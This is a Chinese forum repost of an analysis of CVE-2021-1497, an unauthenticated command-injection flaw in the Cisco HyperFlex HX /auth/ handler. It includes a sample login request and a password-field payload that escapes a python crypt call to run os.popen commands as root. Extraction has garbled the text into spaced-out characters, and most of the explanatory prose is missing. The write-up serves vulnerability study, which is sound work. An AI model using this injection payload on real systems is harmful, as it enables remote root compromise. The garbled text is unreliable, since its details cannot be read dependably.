搜索

[29052] 2021-07-05_【漏洞分析】CVE-2021-1497:CISCOHYPERFLEXHXAUTH处理远程命令执行

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-19
2021-07-05_【漏洞分析】CVE-2021-1497:CISCOHYPERFLEXHXAUTH处理远程命令执行 C V E - 2 0 2 1 - 1 4 9 7 C I S C O   H Y P E R F L E X   H X   A U T H   O t s   2 0 2 1 - 0 7 - 0 5 O t s   K c   U d o n s i     Y a z h i   W a n g     C i s c o   H y p e r F l e x   H X     P o s i t i v e   T e c h n o l o g i e s     N i k i t a   A b r a m o v     M i k h a i l   K l y u c h n i k o v     C V E - 2 0 2 1 - 1 4 9 7   C i s c o   H y p e r F l e x   H X   广   W e b   r o o t     2 0 2 1     5   C i s c o   H y p e r F l e x   H X   使   H T T P     W e b   访 < s e r v e r _ n a m e >   C i s c o   H y p e r F l e x   H X   H T T P     R F C   7 2 3 0   -   7 2 3 7     R F C   /   H T T P     C R L F     ( C R )     ( L F )   S P     U R I   - 使 使   G E T   p a r a m 1   H T T P 使 P O S T / & - d e l i m i t e d   n a m e = v a l u e   h t t p s : / / < s e r v e r _ n a m e > R e q u e s t   =   R e q u e s t - L i n e   h e a d e r s   C R L F   [ m e s s a g e - b o d y ]   R e q u e s t - L i n e   =   M e t h o d   S P   R e q u e s t - U R I   S P   H T T P - V e r s i o n   C R L F   H e a d e r s   =   * [ H e a d e r ]   H e a d e r   =   F i e l d - N a m e   " : "   F i e l d - V a l u e   C R L F G E T   / m y _ w e b a p p / m y p a g e . h t m ? p a r a m = 1   H T T P / 1 . 1   H o s t :   w w w . m y h o s t . c o m P O S T   / m y _ w e b a p p / m y p a g e . h t m   H T T P / 1 . 1   H o s t :   w w w . m y h o s t . c o m   C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d   C o n t e n t - L e n g t h :   7   p a r a m = 1 v a r 1 = v a l u e 1 & v a r 2 = v a l u e 2 & v a r 3 = v a l u e 3 . . .
/ a u t h / C i s c o   H y p e r F l e x   H X   便 / a u t h /   N G I N X     H T T P     T C P / 8 0 8 2     H T T P   H T T P     E L F   / o p t / s p r i n g p a t h / a u t h / a u t h / a u t h /   H T T P   m a i n _ l o g i n H a n d l e r ( ) / e t c / s h a d o w 使 u s e r n a m e H T T P   m a i n _ v a l i d a t e P a s s w o r d ( ) m a i n _ c h e c k H a s h ( ) 使   P y t h o n   < s o m e P a s s >   H T T P   < s a l t > / e t c / s h a d o w   P y t h o n   p a s s w o r d 使   P y t h o n     p a s s w o r d   P y t h o n     P y t h o n     P y t h o n     P y t h o n   O S   C O M M A N D   r o o t     2 0 2 1     5     K c   U d o n s i     Y a z h i   W a n g     T r e n d   M i c r o   R e s e a r c h   访 h t t p : / / g o . t r e n d m i c r o . c o m / t i s / v a r 1 = v a l u e 1 & v a r 2 = v a l u e 2 & v a r 3 = v a l u e 3 . . . P O S T   / a u t h /   H T T P / 1 . 1   H o s t :   1 7 2 . 1 6 . 2 0 . 5 6 : 8 0 8 0   C o n n e c t i o n :   k e e p - a l i v e   C o n t e n t - L e n g t h :   2 7   [ . . .   t r u n c a t e d   f o r   r e a d a b i l i t y   . . . ]   u s e r n a m e = < s o m e N a m e > & p a s s w o r d = < s o m e P a s s > l o c a t i o n   ~   / a u t h /   {           p r o x y _ p a s s                     h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 2 ;           p r o x y _ s e t _ h e a d e r         H o s t   $ h o s t ;           p r o x y _ r e a d _ t i m e o u t     3 6 0 0 ;   }   p y t h o n   - c   ' i m p o r t   c r y p t ;   p r i n t   c r y p t . c r y p t ( " < s o m e P a s s > " ,   " < s a l t > " ) ' " , e v a l ( c o m p i l e ( " " " _ _ i m p o r t _ _ ( ' o s ' ) . p o p e n ( r ' C O M M A N D ' ) . r e a d ( ) " " " , ' ' , ' s i n g l e ' ) ) # i m p o r t   c r y p t ;   p r i n t   c r y p t . c r y p t ( " " , e v a l ( c o m p i l e ( " " " _ _ i m p o r t _ _ ( ' o s ' )   . p o p e n ( r ' C O M M A N D ' ) . r e a d ( ) " " " , ' ' , ' s i n g l e ' ) ) # " ,   " < s a l t > " )
h t t p s : / / w w w . z e r o d a y i n i t i a t i v e . c o m / b l o g / 2 0 2 1 / 6 / 2 3 / c v e - 2 0 2 1 - 1 4 9 7 - c i s c o - h y p e r f l e x - h x - a u t h - h a n d l i n g - r e m o t e - c o m m a n d - e x e c u t i o n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理